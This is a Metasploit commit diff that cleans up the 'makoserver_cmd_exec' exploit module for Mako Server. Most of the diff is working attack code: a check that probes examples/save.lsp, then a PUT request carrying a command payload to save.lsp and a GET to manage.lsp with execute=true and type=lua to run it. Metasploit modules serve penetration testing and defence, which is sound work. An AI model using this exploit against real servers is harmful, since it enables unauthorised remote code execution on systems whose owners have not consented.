Land #9193, makoserver_cmd_exec cleanup

MS-2855/keylogger-mettle-extension
William Vu 2017-11-10 10:36:16 -06:00
commit 7b5ec9d0ec
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
1 changed files with 18 additions and 14 deletions

View File

@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('URI', [true, 'URI path to the Mako Server app', '/']) OptString.new('TARGETURI', [true, 'URI path to the Mako Server app', '/'])
] ]
) )
end end
@ -53,17 +53,17 @@ class MetasploitModule < Msf::Exploit::Remote
# Send GET request to determine existence of save.lsp page # Send GET request to determine existence of save.lsp page
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp') 'uri' => normalize_uri(target_uri.path, 'examples/save.lsp')
}, 20) }, 20)
# If response does not include "MakoServer.net", target is not viable. # If response does not include "MakoServer.net", target is not viable.
if res.headers['Server'] !~ /MakoServer.net/ if res.headers['Server'] !~ /MakoServer\.net/
vprint_warning('Target is not a Mako Server.') vprint_warning('Target is not a Mako Server.')
return CheckCode::Safe return CheckCode::Safe
end end
if res.body if res.body
if res.body =~ /Incorrect usage/ if res.body.include?('Incorrect usage')
# We are able to determine that the server has a save.lsp page and # We are able to determine that the server has a save.lsp page and
# returns the correct output. # returns the correct output.
vprint_status('Mako Server save.lsp returns correct ouput.') vprint_status('Mako Server save.lsp returns correct ouput.')
@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
return CheckCode::Unknown return CheckCode::Unknown
end end
return CheckCode::Safe CheckCode::Safe
end end
def exploit def exploit
@ -98,13 +98,12 @@ class MetasploitModule < Msf::Exploit::Remote
begin begin
vprint_status('Sending PUT request to save.lsp...') vprint_status('Sending PUT request to save.lsp...')
send_request_cgi({ send_request_cgi({
'method' => 'PUT', 'method' => 'PUT',
'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'), 'uri' => normalize_uri(target_uri.path, 'examples/save.lsp'),
'ctype' => 'text/plain', 'ctype' => 'text/plain',
'data' => cmd, 'data' => cmd,
'http' => { 'vars_get' => {
'X-Requested-With' => 'XMLHttpRequest', 'ex' => '2.1'
'Referer' => 'http://localhost/Lua-Types.lsp'
} }
}, 20) }, 20)
rescue StandardError => e rescue StandardError => e
@ -115,8 +114,13 @@ class MetasploitModule < Msf::Exploit::Remote
begin begin
vprint_status('Sending GET request to manage.lsp...') vprint_status('Sending GET request to manage.lsp...')
send_request_cgi({ send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua') 'uri' => normalize_uri(target_uri.path, 'examples/manage.lsp'),
'vars_get' => {
'execute' => 'true',
'ex' => '2.1',
'type' => 'lua'
}
}, 20) }, 20)
rescue StandardError => e rescue StandardError => e
fail_with(Failure::NoAccess, "Error: #{e}") fail_with(Failure::NoAccess, "Error: #{e}")